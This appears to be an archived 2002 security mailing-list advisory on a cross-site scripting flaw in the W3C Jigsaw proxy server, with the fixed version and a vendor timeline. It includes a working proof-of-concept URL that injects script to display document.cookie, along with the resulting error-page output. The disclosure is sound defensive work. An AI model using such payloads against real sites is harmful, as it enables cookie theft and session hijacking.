OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: TAKAGI, Hiromitsu (takagi.hiromitsu_at_aist.go.jp)
Date: Sat Aug 17 2002 - 14:10:45 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability
    ===========================================================

    Affected:
      Jigsaw 2.2.0 and earlier
      http://www.w3.org/Jigsaw/RelNotes.html#2.2.0

    Fixed:
      Jigsaw 2.2.1
      http://www.w3.org/Jigsaw/RelNotes.html#2.2.1

    Exploit:
      http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>

      ========================================================
      An HTTP error occured while getting: <p>
      <strong>
    http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT></strong><p>
      Details "The host name [nonexistenthost.google.com] couldn't be resolved.
      Details: "nonexistenthost.google.com"".<hr>Generated by
      <i>
    http://.............:8001/
    ...snip...
      ========================================================
      
      Similar problems have been found in Proxomitron Naoko-4 BetaFour,
      Microsoft ISA Server and Squid 2.4 DEVEL4.
      <http://www.securityfocus.com/bid/3087>
      <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
      <http://www.securityfocus.com/archive/1/197606>

    Vendor Status:
      Aug 10, 2001: Notified
      Jan 4, 2002: Responded
      Apr 8, 2002: Fix released

    Best regards,

    --
    Hiromitsu Takagi
    http://staff.aist.go.jp/takagi.hiromitsu/